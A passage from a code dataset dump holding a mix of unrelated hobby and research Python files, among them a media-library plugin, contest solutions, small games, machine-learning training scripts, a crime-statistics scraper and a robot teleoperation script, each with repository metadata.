allowed_values):\n    \"\"\"\n    Check whether the configured JSONata query result contains one of the values being searched for\n\n    :return:\n    \"\"\"\n    # If the config is empty (not yet configured) ignore everything\n    if not allowed_values:\n        logger.debug(\"Plugin has not yet been configured with a list of values to allow. Blocking everything.\")\n        return False\n\n    # Require a list of probe streams to continue\n    file_path = probe_info.get('format', {}).get('filename')\n    file_probe_streams = probe_info.get('streams')\n    if not file_probe_streams:\n        return False\n\n    try:\n        context = jsonata.Context()\n        discovered_values = context(stream_field, probe_info)\n    except ValueError as e:\n        logger.debug(\"Failed to apply the JSONata query to the FFprobe data of the file '%s'.\", file_path)\n        #logger.debug(\"Exception:\", exc_info=e)\n        return False\n\n    for allowed_value in allowed_values.split(','):\n        # Ignore empty values (if plugin is configured with a trailing ',')\n        if allowed_value:\n            if allowed_value in discovered_values:\n                logger.debug(\"File '%s' contains one of the configured values '%s'.\", file_path, allowed_value)\n                return True\n\n    # File does not match any of the allowed values\n    logger.debug(\"File '%s' does not contain one of the specified values '%s'.\", file_path, allowed_values)\n    return False\n\n\ndef on_library_management_file_test(data):\n    \"\"\"\n    Runner function - enables additional actions during the library management file tests.\n\n    The 'data' object argument includes:\n        library_id - The library that the current task is associated with\n        path - String containing the full path to the file being tested.\n        issues - List of currently found issues for not processing the file.\n        add_file_to_pending_tasks - Boolean, is the file currently marked to be added to the queue for processing.\n        priority_score - Integer, an additional score that can be added to set the position of the new task in the task queue.\n        shared_info - Dictionary, information provided by previous plugin runners. This can be appended to for subsequent runners.\n\n    :param data:\n    :return:\n\n    \"\"\"\n\n    # Get settings\n    settings = Settings(library_id=data.get('library_id'))\n\n    # Get the path to the file\n    abspath = data.get('path')\n\n    # Get file probe\n    probe = Probe.init_probe(data, logger, allowed_mimetypes=['audio', 'video'])\n    if not probe:\n        # File not able to be probed by ffprobe\n        return\n\n    # Get the list of configured values to search for\n    stream_field = settings.get_setting('stream_field')\n    allowed_values = settings.get_setting('allowed_values')\n\n    in_allowed_values = file_ends_in_allowed_values(probe.get_probe(), stream_field, allowed_values)\n    if not in_allowed_values:\n        # Ignore this file\n        data['add_file_to_pending_tasks'] = False\n    elif settings.get_setting('add_all_matching_values'):\n        # Force this file to have a pending task created\n        data['add_file_to_pending_tasks'] = True\n        logger.debug(\n            \"File '%s' should be added to task list. 
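(An illustrative aside, not part of the plugin: the snippet below exercises the same matching logic in isolation. The query string and probe dict are invented examples; in the plugin the probe data comes from ffprobe via Probe.get_probe().)

```python
# Hedged sketch of the match performed above: evaluate a JSONata query
# against a probe-like dict and test membership of the configured values.
import jsonata

probe_info = {"streams": [{"codec_name": "hevc"}, {"codec_name": "aac"}]}
stream_field = "streams.codec_name"   # example query (an assumption)
allowed_values = "hevc,h264"          # example search strings

context = jsonata.Context()
discovered_values = context(stream_field, probe_info)
print(any(v and v in discovered_values for v in allowed_values.split(",")))
```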
\"\n \"File contains specified video codec and plugin is configured to add all matching files.\", abspath)\n","repo_name":"Unmanic/plugin.limit_library_search_by_ffprobe_data","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22040929985","text":"# diverse -> if count(s[i]) <= distinct_cnt\n# max distinct chars -> 0, 1, 2, ... , 9 -> 10\n# max length of distinct string -> 10 of each char -> 10^2 = 100\n# for each starting point, check next 100 chars to see if distinct\n# O(n * 10^2)\n\n\nfor _ in range(int(input())):\n n = int(input())\n s = input()\n ans = 0\n\n for i in range(n):\n j = i\n cnts = [0] * 10\n curr_max = 0\n distinct = 0\n\n while j < n and j - i + 1 <= 100:\n curr = int(s[j])\n if cnts[curr] == 0:\n distinct += 1\n cnts[curr] += 1\n curr_max = max(curr_max, cnts[curr])\n if curr_max <= distinct:\n ans += 1\n j += 1\n \n print(ans)","repo_name":"hiroto0222/CodeQuestions","sub_path":"CodeForces/round_833_div_2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13219529503","text":"#time complexity : O(logn)\n#Space complexity: O(1)\ndef find_element(arr):\n low = 0\n high = len(arr) - 1\n while low + 1 < high:\n mid = low + (high - low) // 2\n \n middiff = arr[mid] - mid\n lowdiff = arr[low] - low\n highdiff = arr[high] - high\n \n if middiff != lowdiff:\n high = mid\n elif middiff != highdiff:\n low = mid\n \n return arr[low] + 1\n \n\narr = [1,3,4,5,7]\nvar = find_element(arr)\nprint(var)","repo_name":"pvk3081/Competitive-Coding-1","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"28714007519","text":"p1_score = 0\r\np2_score = 0\r\n\r\n\r\ndef rps_game():\r\n # Prompt users to input r, p, or s\r\n item1 = input(\r\n \"Player 1 - Enter 'r' for Rock, 'p' for Paper, or 's' for Scissors:\\n\").lower()\r\n item2 = input(\r\n \"Player 2 - Enter 'r' for Rock, 'p' for Paper, or 's' for Scissors:\\n\").lower()\r\n\r\n # check to see if valid input for r, p, or s\r\n if item1 == 'r' or item1 == 'p' or item1 == 's':\r\n pass\r\n else:\r\n item1 = input(\r\n \"Player 1 entered invalid input. Please enter 'r', 'p', or 's':\\n\")\r\n if item2 == 'r' or item2 == 'p' or item2 == 's':\r\n pass\r\n else:\r\n item2 = input(\r\n \"Player 2 entered invalid input. 
Please enter 'r', 'p', or 's':\\n\")\r\n\r\n # determine who wins\r\n # player 1 = r, player 2 = r,p,s\r\n if item1 == 'r':\r\n if item2 == 'r':\r\n print(\"It's a tie!\")\r\n if item2 == 'p':\r\n print(\"Player 2 wins!\")\r\n add_scores(2)\r\n if item2 == 's':\r\n print(\"Player 1 wins!\")\r\n add_scores(1)\r\n # player 1 = s, player 2 = r,p,s\r\n if item1 == 's':\r\n if item2 == 's':\r\n print(\"It's a tie!\")\r\n if item2 == 'p':\r\n print(\"Player 1 wins!\")\r\n add_scores(1)\r\n if item2 == 'r':\r\n print(\"Player 2 wins!\")\r\n add_scores(2)\r\n # player 1 = p, player 2 = r,p,s\r\n if item1 == 'p':\r\n if item2 == 'p':\r\n print(\"It's a tie!\")\r\n if item2 == 's':\r\n print(\"Player 2 wins!\")\r\n add_scores(2)\r\n if item2 == 'r':\r\n print(\"Player 1 wins!\")\r\n add_scores(1)\r\n\r\n\r\ndef add_scores(play):\r\n global p1_score, p2_score\r\n if play == 1:\r\n p1_score += 1\r\n return str(p1_score-1)\r\n if play == 2:\r\n p2_score += 1\r\n return str(p2_score-1)\r\n","repo_name":"anoeller/games_project","sub_path":"rps_game.py","file_name":"rps_game.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25173163134","text":"import sounddevice as sd\nimport speech_recognition as sr\nimport wavio\nimport soundfile as sf\nfrom playsound import playsound\nimport os\nfrom time import sleep\n\n#Define function for recording voice\ndef record_voice():\n key = input(\"Press enter to begin recording\")\n if key == '':\n #Record voice into an array\n seconds = 15\n f = 44100\n print(\"Now recording\")\n voice_recording = sd.rec(int(seconds * f), samplerate=f, channels=1)\n sleep(8)\n print(\"Recording will stop in...\")\n sleep(2)\n for i in range(5, 0, -1):\n print(i)\n sleep(1)\n sd.wait()\n print(\"Stopped Recording.\")\n #Save voice recording as .wav file\n wavio.write(\"voicerecording.wav\", voice_recording, f, sampwidth=2)\n #Play voice recording\n print(\"Playing your recording...\")\n playsound(\"voicerecording.wav\")\n else:\n quit()\n\n#Allow user to record themselves and give option to recieve transcript or re-record\nwhile True:\n record_voice()\n key2 = input(\"Press enter to record yourself again, enter t to get a transcript of your recording, enter q to exit: \")\n if key2 == \"t\":\n break\n if key2 == \"q\":\n quit()\n os.remove(\"voicerecording.wav\")\n\n#Retrieve transcript of recording\nprint(\"Retrieving your transcript...\")\n#Listen to the .wav file containg voice recording\nwith sr.AudioFile(\"voicerecording.wav\") as source:\n l_recording = sr.Recognizer().listen(source)\n# Use Google recognizer for speech to text conversion\n try:\n transcript = sr.Recognizer().recognize_google(l_recording)\n print(\"Transcript:\",transcript)\n except:#In case Google is unable to recognize\n print(\"Unable to retrieve transcript.\")\n\n#Delete voice recording\nos.remove(\"voicerecording.wav\")\n","repo_name":"Hifa12/Speech-to-Text-Converter","sub_path":"speech-to-text.py","file_name":"speech-to-text.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32180026783","text":"import string\nimport sys\n\ndef text_analyzer(text=None):\n\t'''This function counts the number of upper characters, \nlower characters, punctuation and spaces in a given text.'''\n\tif text is None:\n\t\ttext = input(\"Insert text:\\n\")\n\tif not isinstance(text, str):\n\t\tprint(\"AssertionError: argument is 
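(A side note on the rock-paper-scissors winner logic above, not the author's code: the nine nested branches can be collapsed with a small "beats" mapping. This is a hedged, equivalent sketch.)

```python
# Each key beats the move it maps to: rock > scissors, paper > rock,
# scissors > paper.
def winner(item1, item2):
    beats = {'r': 's', 'p': 'r', 's': 'p'}
    if item1 == item2:
        return "It's a tie!"
    return "Player 1 wins!" if beats[item1] == item2 else "Player 2 wins!"

print(winner('r', 's'))  # Player 1 wins!
print(winner('s', 'r'))  # Player 2 wins!
```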
not a string\")\n\telse:\n\t\ttotalchars = len(text)\n\t\tupper = sum(1 for i in text if i.isupper())\n\t\tlower = sum(1 for i in text if i.islower())\n\t\tspace = sum(1 for i in text if i == \" \")\n\t\tpunctuation = sum(1 for i in text if i in string.punctuation)\n\t\tprint(\"The text contains\", totalchars,\"character(s)\")\n\t\tprint(\"-\", upper, \"upper letters(s)\")\n\t\tprint(\"-\", lower, \"lower letter(s)\")\n\t\tprint(\"-\", punctuation, \"punctuation mark(s)\")\n\t\tprint(\"-\", space, \"space(s)\")\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) > 1:\n\t\tif len(sys.argv) == 2:\n\t\t\ttext_analyzer(sys.argv[1])\n\t\telse:\n\t\t\tprint(\"Error: more than one argument are provided\")\n","repo_name":"rafav99/python00","sub_path":"ex03/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"33383616171","text":"r\"\"\" a sample implementation of LAS for HKUST \"\"\"\nimport sys\nimport json\nfrom absl import logging\nfrom athena.main import parse_config, SUPPORTED_DATASET_BUILDER\n\nif __name__ == \"__main__\":\n logging.set_verbosity(logging.INFO)\n if len(sys.argv) < 3:\n logging.warning('Usage: python {} config_json_file data_csv_file'.format(sys.argv[0]))\n sys.exit()\n jsonfile, csv_file = sys.argv[1], sys.argv[2]\n\n with open(jsonfile) as file:\n config = json.load(file)\n p = parse_config(config)\n if \"speed_permutation\" in p.trainset_config:\n p.trainset_config['speed_permutation'] = [1.0]\n dataset_builder = SUPPORTED_DATASET_BUILDER[p.dataset_builder](p.trainset_config)\n dataset_builder.preprocess_data(csv_file).compute_cmvn_if_necessary(True)\n","repo_name":"athena-team/athena","sub_path":"athena/cmvn_main.py","file_name":"cmvn_main.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":920,"dataset":"github-code","pt":"29"} +{"seq_id":"42136050435","text":"import gymnasium as gym\nimport custom_grid\nfrom stable_baselines3 import DQN\nimport os\nimport time\n\nmodels_dir = f\"models/{int(time.time())}/\"\nlogdir = f\"logs/{int(time.time())}/\"\n\nif not os.path.exists(models_dir):\n\tos.makedirs(models_dir)\n\nif not os.path.exists(logdir):\n\tos.makedirs(logdir)\n\n\nenv = gym.make(\"GridWorldEnv-v0\", render_mode=\"human\")\n\nmodel = DQN(\"MultiInputPolicy\", env, verbose=1, tensorboard_log=logdir)\n\n\nTIMESTEPS = 10000\niters = 0\nwhile True:\n\titers += 1\n\tmodel.learn(total_timesteps=TIMESTEPS, reset_num_timesteps=False, tb_log_name=f\"DQN\")\n\tmodel.save(f\"{models_dir}/{TIMESTEPS*iters}\")\n\t\n","repo_name":"AntoineC1990/Jumbo_Challenge","sub_path":"custom_grid/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42943278994","text":"import tensorflow as tf\nfrom tensorflow import keras\n\nfrom sklearn import model_selection\nimport load_mnist\n\n\nX, y, X_test, y_test = load_mnist.load_data()\nX = X.reshape(-1, 28, 28) / 255\nX_test = X_test.reshape(-1, 28, 28) / 255\n\nX_train, X_val, y_train, y_val = model_selection.train_test_split(X, y, test_size=0.1, random_state=42)\n\ninput_ = keras.layers.Input(shape=[28, 28, 1])\nconv1 = keras.layers.Conv2D(64, 5, padding='same', activation='relu')(input_)\nmax_pool1 = keras.layers.MaxPooling2D(2)(conv1)\nconv2 = keras.layers.Conv2D(128, 5, strides=1, padding='same', 
activation='relu')(max_pool1)\nconv3 = keras.layers.Conv2D(128, 5, strides=1, padding='same', activation='relu')(conv2)\nmax_pool2 = keras.layers.MaxPooling2D(2)(conv3)\nconv4 = keras.layers.Conv2D(256, 3, strides=1, padding='same', activation='relu')(max_pool2)\nconv5 = keras.layers.Conv2D(256, 3, strides=1, padding='same', activation='relu')(conv4)\nmax_pool3 = keras.layers.MaxPooling2D(2)(conv5)\nflatten = keras.layers.Flatten()(max_pool3)\ndense = keras.layers.Dense(128, activation='relu')(flatten)\ndropout = keras.layers.Dropout(0.5)(dense)\noutput = keras.layers.Dense(10, activation='softmax')(dropout)\n\nmodel = keras.Model(inputs=[input_], outputs=[output])\n\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.fit(X_train, y_train, epochs=5, validation_data=(X_val, y_val))\nmodel.evaluate(X_test, y_test)\n","repo_name":"longphanp/my_playground","sub_path":"first_cnn.py","file_name":"first_cnn.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29690598652","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 12 16:05:16 2022\n\n@author: rebecca\n\"\"\"\n\n#ic3\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup as bs\nfrom assistant import parse_it\nfrom pandas_gbq import to_gbq\nfrom time import sleep\nimport pandas as pd\n\ndef get_ic3(driver, wait, today, ic3_table_id):\n\n ic3_years = list(range(2016,2022))\n\n ic3_list = []\n\n for ic3_year in ic3_years:\n \n ic3_url = 'https://www.ic3.gov/Media/PDF/AnnualReport/{}State/StateReport.aspx'.format(str(ic3_year))\n \n driver.get(ic3_url)\n \n for i in range(2,59): \n \n #get selected state from site title\n state_dropdown_xpath = '/html/body/div/form/header/div[2]/h1'\n selected_state = wait.until(EC.element_to_be_clickable((By.XPATH, state_dropdown_xpath))).text\n \n print(ic3_year, selected_state)\n \n #switch to soup\n soup = bs(driver.page_source, 'lxml') \n \n #find all the page tables\n ic3_tables = soup.find_all('table', class_ = 'crimetype')\n\n ic3_table_list = []\n \n for ic3_table in ic3_tables:\n\n #parse table\n this_ic3_table = parse_it(ic3_table)\n \n #convert to dataframe, set headers\n this_ic3_table_df = pd.DataFrame(this_ic3_table, columns = this_ic3_table[0])\n \n #drop the first row\n this_ic3_table_df = this_ic3_table_df.drop(this_ic3_table_df.index[0])\n \n #handle the column's layout\n first_ic3_subset_df = this_ic3_table_df.iloc[:,0:2]\n second_ic3_subset_df = this_ic3_table_df.iloc[:,2:4]\n ic3_df = pd.concat([first_ic3_subset_df, second_ic3_subset_df])\n \n #insert state and source\n ic3_df['state'] = selected_state\n ic3_df['year'] = ic3_year\n ic3_df['url'] = ic3_url\n \n ic3_table_list.append(ic3_df)\n\n #bring it all together\n ic3_dff = ic3_table_list[1].merge(ic3_table_list[0],\n on = ['Crime Type', 'state', 'year']).merge(ic3_table_list[2], \n on = ['Crime Type', 'state', 'year'])\n #drop duplicates (if exists)\n ic3_dff = ic3_dff.drop_duplicates()\n\n #reorder\n ic3_dfff = ic3_dff[['Crime Type', 'state', 'year', 'Subject Count', 'Victim Count', 'Loss Amount']]\n\n #make columns lower case\n ic3_dfff.columns = [x.lower() for x in ic3_dfff.columns.values.tolist()]\n\n #replace column spaces with underscores\n ic3_dfff.columns = [x.replace(' ','_') for x in ic3_dfff.columns.values.tolist()]\n \n #add to the list\n 
ic3_list.append(ic3_dfff)\n \n #update the url\n updated_url = ic3_url + '#?s={}'.format(str(i))\n \n #get the updated url\n driver.get(updated_url)\n \n sleep(3) \n\n #put it all together\n final_ic3_dff = pd.concat(ic3_list)\n\n #remove duplicates and null records (if exist)\n final_ic3_dff = final_ic3_dff.drop_duplicates()\n final_ic3_dff = final_ic3_dff.dropna(subset = ['subject_count', 'loss_amount', 'victim_count'])\n\n #clean up the $ & , formatting\n final_ic3_dff['loss_amount'] = final_ic3_dff['loss_amount'].str.replace('$','', regex = False).str.replace(',','', regex = False)\n final_ic3_dff['subject_count'] = final_ic3_dff['subject_count'].str.replace(',','', regex = False)\n final_ic3_dff['victim_count'] = final_ic3_dff['victim_count'].str.replace(',','', regex = False)\n final_ic3_dff = final_ic3_dff.reset_index().drop('index', axis = 1)\n \n #convert the non-null counts/amounts into integer type\n for i in range(0, len(final_ic3_dff.index)):\n loss_amount = final_ic3_dff.loc[i, 'loss_amount']\n if loss_amount is not None:\n loss_amount = int(loss_amount)\n final_ic3_dff.loc[i,'loss_amount'] = loss_amount\n \n subject_count = final_ic3_dff.loc[i, 'subject_count']\n if subject_count is not None:\n subject_count = int(subject_count)\n final_ic3_dff.loc[i,'subject_count'] = subject_count\n \n victim_count = final_ic3_dff.loc[i, 'victim_count']\n if victim_count is not None:\n victim_count = int(victim_count)\n final_ic3_dff.loc[i,'victim_count'] = victim_count\n\n #save copy locally\n final_ic3_dff.to_csv('backup-data/ic3_data-{}.csv'.format(today), index = False)\n\n #load to big query\n to_gbq(final_ic3_dff, \n ic3_table_id, \n project_id = 'cyber-crime-360523', \n if_exists = 'replace')\n \n \n ","repo_name":"becca-mayers/cyber-security","sub_path":"ic3_reports.py","file_name":"ic3_reports.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30896982955","text":"\"\"\"\n player\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport logging\n\nfrom mcedit2.rendering.chunkmeshes.entity.biped import ModelBiped\nfrom mcedit2.rendering.chunkmeshes.entity.modelrenderer import ModelRenderer\n\nlog = logging.getLogger(__name__)\n\n\nclass ModelPlayer(ModelBiped):\n id = \"MCEDIT_Player\"\n textureWidth = 64\n textureHeight = 64\n modelTexture = None\n\n def __init__(self, expandOffset=0.0, headOffset=0.0, smallArms=False):\n super(ModelPlayer, self).__init__(expandOffset, headOffset)\n \n self.smallArms = smallArms\n self.bipedCape = ModelRenderer(self, 0, 0)\n # self.bipedCape.setTextureSize(64, 32)\n self.bipedCape.addBox(-5.0, 0.0, -1.0, 10, 16, 1, expandOffset)\n\n if smallArms:\n self.bipedLeftArm = ModelRenderer(self, 32, 48)\n self.bipedLeftArm.addBox(-1.0, -2.0, -2.0, 3, 12, 4, expandOffset)\n self.bipedLeftArm.setCenterPoint(5.0, 2.5, 0.0)\n self.bipedRightArm = ModelRenderer(self, 40, 16)\n self.bipedRightArm.addBox(-2.0, -2.0, -2.0, 3, 12, 4, expandOffset)\n self.bipedRightArm.setCenterPoint(-5.0, 2.5, 0.0)\n self.bipedLeftArmwear = ModelRenderer(self, 48, 48)\n self.bipedLeftArmwear.addBox(-1.0, -2.0, -2.0, 3, 12, 4, expandOffset + 0.25)\n self.bipedLeftArmwear.setCenterPoint(5.0, 2.5, 0.0)\n self.bipedRightArmwear = ModelRenderer(self, 40, 32)\n self.bipedRightArmwear.addBox(-2.0, -2.0, -2.0, 3, 12, 4, expandOffset + 0.25)\n self.bipedRightArmwear.setCenterPoint(-5.0, 2.5, 10.0)\n \n else:\n self.bipedLeftArm = 
ModelRenderer(self, 32, 48)\n            self.bipedLeftArm.addBox(-1.0, -2.0, -2.0, 4, 12, 4, expandOffset)\n            self.bipedLeftArm.setCenterPoint(5.0, 2.0, 0.0)\n            self.bipedLeftArmwear = ModelRenderer(self, 48, 48)\n            self.bipedLeftArmwear.addBox(-1.0, -2.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n            self.bipedLeftArmwear.setCenterPoint(5.0, 2.0, 0.0)\n            self.bipedRightArmwear = ModelRenderer(self, 40, 32)\n            self.bipedRightArmwear.addBox(-3.0, -2.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n            self.bipedRightArmwear.setCenterPoint(-5.0, 2.0, 10.0)\n        \n        self.bipedLeftLeg = ModelRenderer(self, 16, 48)\n        self.bipedLeftLeg.addBox(-2.0, 0.0, -2.0, 4, 12, 4, expandOffset)\n        self.bipedLeftLeg.setCenterPoint(1.9, 12.0, 0.0)\n        self.bipedLeftLegwear = ModelRenderer(self, 0, 48)\n        self.bipedLeftLegwear.addBox(-2.0, 0.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n        self.bipedLeftLegwear.setCenterPoint(1.9, 12.0, 0.0)\n        self.bipedRightLegwear = ModelRenderer(self, 0, 32)\n        self.bipedRightLegwear.addBox(-2.0, 0.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n        self.bipedRightLegwear.setCenterPoint(-1.9, 12.0, 0.0)\n        self.bipedBodyWear = ModelRenderer(self, 16, 32)\n        self.bipedBodyWear.addBox(-4.0, 0.0, -2.0, 8, 12, 4, expandOffset + 0.25)\n        self.bipedBodyWear.setCenterPoint(0.0, 0.0, 0.0)\n\n    @property\n    def parts(self):\n        return [\n            self.bipedHead,\n            self.bipedHeadwear,\n            self.bipedBody,\n            self.bipedBodyWear,\n            self.bipedRightArm,\n            self.bipedRightArmwear,\n            self.bipedLeftArm,\n            self.bipedLeftArmwear,\n            self.bipedRightLeg,\n            self.bipedRightLegwear,\n            self.bipedLeftLeg,\n            self.bipedLeftLegwear,\n        ]\n","repo_name":"mcedit/mcedit2","sub_path":"src/mcedit2/rendering/chunkmeshes/entity/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"29"} +{"seq_id":"1887334151","text":"N = int(input())\nl = list(map(int, input().split()))\nallowance = int(input())\nanswer = 0\n\ndef calc(limit):\n    left = allowance\n    for x in l:\n        left -= min(limit, x)\n        if left < 0:\n            return False\n\n    return True\n\n\ndef bsearch(start, end):\n    # print(f\"start: {start}, end: {end}\")\n    global answer\n\n    mid = (start + end) // 2\n\n    if calc(mid):\n        answer = mid\n        if start != end:\n            bsearch(mid + 1, end)\n    else:\n        if start != end and start <= mid - 1:\n            bsearch(start, mid - 1)\n\n\nbsearch(0, max(l))\nprint(answer)\n","repo_name":"qpzm/PS","sub_path":"boj/2512/2512.py","file_name":"2512.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"33949912213","text":"import requests\nimport json\n\ndef calRoutes(start, stop):\n    url = 'http://router.project-osrm.org/route/v1/driving/' + start + ';' + stop + '?geometries=geojson&overview=simplified&steps=false'\n    response = requests.get(url)\n    data = response.json()\n    try:\n        routes = data[\"routes\"][0][\"geometry\"]\n        return routes\n    except KeyError:\n        return\n\nstart = '-87.683593,41.991178'\nstop = '-87.5761197602,41.78101637196'\nroutes = calRoutes(start, stop)\nprint(routes)\n\njson.dumps(routes,sort_keys=True,indent=4)","repo_name":"QuinnXu/DivvyBikes-Visualisation","sub_path":"Data scripts/raw_data/statistic_route/route_osrm.py","file_name":"route_osrm.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1165615294","text":"# Topologically order the vertices with a DFS, paint all the leaves first, then keep painting upward (bottom-up) wherever the condition still holds\n\nimport 
sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(v):\n    visited[v] = True\n    for nv in G[v]:\n        if visited[nv]: continue\n        dfs(nv)\n    path.append(v)\n\nN = int(input())\nG = [[] for _ in range(N+1)]\ncol = [0]*(N+1)\npath = []\nvisited = [False]*(N+1)\n\nfor _ in range(N-1):\n    a, b = map(int, input().split())\n    G[a].append(b)\n    G[b].append(a)\n    \ndfs(1)\n\ncnt = 0\nfor i in range(N):\n    v = path[i]\n    is_ok = True\n    for nv in G[v]:\n        if col[nv] == 1: \n            is_ok = False\n            break\n    if is_ok: \n        col[v] = 1\n        cnt += 1\n        if cnt == N//2:\n            break\n\nfor i in range(N+1):\n    if col[i]: print(i, end=' ')\nprint()","repo_name":"shiroyang/AtcoderSubmission","sub_path":"atcoder.jp/typical90/typical90_z/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15283762805","text":"from time import sleep\nimport sys\nsys.path.append('/home/ubuntu/Desktop/embedded-labs/tankbot')\nfrom libs.tiva import *\nimport pygame\n\n# Define the initial velocities\nleft_velocity = 0\nright_velocity = 0\n\n# Define two velocity options\nvelocities = {\n    '1': 30,\n    '2': 35\n}\n\n# Current velocity option\ncurrent_velocity = 30 # Default to 30\n\n# Function to update motor velocities and LED control\ndef update_motors_and_leds():\n    motors.move(left_velocity, right_velocity)\n    # Leds.write(0, 1, 0, 1) # You can change the LED pattern here\n\n# Initialize pygame\npygame.init()\n\n# Function to handle key presses\ndef on_key_press(key):\n    global left_velocity, right_velocity, current_velocity\n    if key == pygame.K_UP:\n        left_velocity = current_velocity\n        right_velocity = current_velocity\n    elif key == pygame.K_DOWN:\n        left_velocity = -current_velocity\n        right_velocity = -current_velocity\n    elif key == pygame.K_LEFT:\n        left_velocity = -current_velocity\n        right_velocity = current_velocity\n    elif key == pygame.K_RIGHT:\n        left_velocity = current_velocity\n        right_velocity = -current_velocity\n    elif key == pygame.K_ESCAPE: # Exit the program with the Esc key\n        pygame.quit()\n        sys.exit()\n    elif key == pygame.K_SPACE: # Stop the motors with the Space key\n        left_velocity = 0\n        right_velocity = 0\n        motors.stop()\n    elif pygame.K_0 <= key <= pygame.K_9 and chr(key) in velocities: # Check if a number key (1 or 2) is pressed\n        # event.key is an int keycode (it has no .isdigit()); pygame digit\n        # keycodes equal ord('0')..ord('9'), so chr() recovers the character\n        key_char = chr(key)\n        if key_char == \"1\":\n            Leds.write(1, 0, 0, 0)\n        elif key_char == \"2\":\n            Leds.write(0, 1, 0, 0)\n        current_velocity = velocities[key_char]\n        print(f\"Selected velocity: {current_velocity}\")\n    update_motors_and_leds()\n\nif __name__ == \"__main__\":\n    tiva1 = InitSerial(baud=9600)\n    motors = Motors(serial_instance=tiva1)\n    Leds = LedControl(serial_instance=tiva1)\n    Leds.init_system(cam=0) # Repair cam=1\n\n    update_motors_and_leds()\n\n    # Main event loop\n    while True:\n        for event in pygame.event.get():\n            if event.type == pygame.KEYDOWN:\n                on_key_press(event.key)\n            elif event.type == pygame.KEYUP:\n                if event.key in (pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT):\n                    left_velocity = 0\n                    right_velocity = 0\n                    motors.stop()\n                    update_motors_and_leds()\n        sleep(0.01) # Add a small delay to control the loop speed\n","repo_name":"97hackbrian/embedded-labs","sub_path":"tankbot/scr/TeleOp3.py","file_name":"TeleOp3.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"71953090959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: hussein\n\"\"\"\n\nimport csv\n\nwith open('robot1.csv', 'w', newline='') as f:\n    fieldnames 
= ['column1', 'column2', 'column3']\n thewriter = csv.DictWriter(f, fieldnames=fieldnames)\n \n thewriter.writeheader()\n for i in range(1,5):\n thewriter.writerow({'column1' : 'one', 'column2' : 'two', 'column3' : 'three'})\n \n ","repo_name":"HusseinLezzaik/Deep-Learning-for-Multi-Robotics","sub_path":"Two Robots Topology Graph/Data Collection/CSV read code/csvdic_write.py","file_name":"csvdic_write.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"29"} +{"seq_id":"36028736211","text":"import unittest\n\nimport numpy as np\nfrom test_imperative_base import new_program_scope\n\nimport paddle\nfrom paddle import base\nfrom paddle.base import core\nfrom paddle.base.dygraph.base import to_variable\n\n\nclass RecurrentTest(paddle.nn.Layer):\n def __init__(self, name_scope):\n super().__init__(name_scope)\n\n def forward(self, in1, in2):\n out = paddle.matmul(in1, in2)\n sum_out = paddle.sum(out)\n return sum_out, out\n\n\nclass TestRecurrentFeed(unittest.TestCase):\n def test_recurrent_feed(self):\n seed = 90\n original_np1 = np.arange(1, 5).reshape(2, 2).astype(\"float32\")\n original_np2 = np.arange(5, 9).reshape(2, 2).astype(\"float32\")\n with base.dygraph.guard():\n base.default_startup_program().random_seed = seed\n base.default_main_program().random_seed = seed\n original_in1 = to_variable(original_np1)\n original_in2 = to_variable(original_np2)\n original_in1.stop_gradient = False\n original_in2.stop_gradient = False\n rt = RecurrentTest(\"RecurrentTest\")\n\n for i in range(3):\n sum_out, out = rt(original_in1, 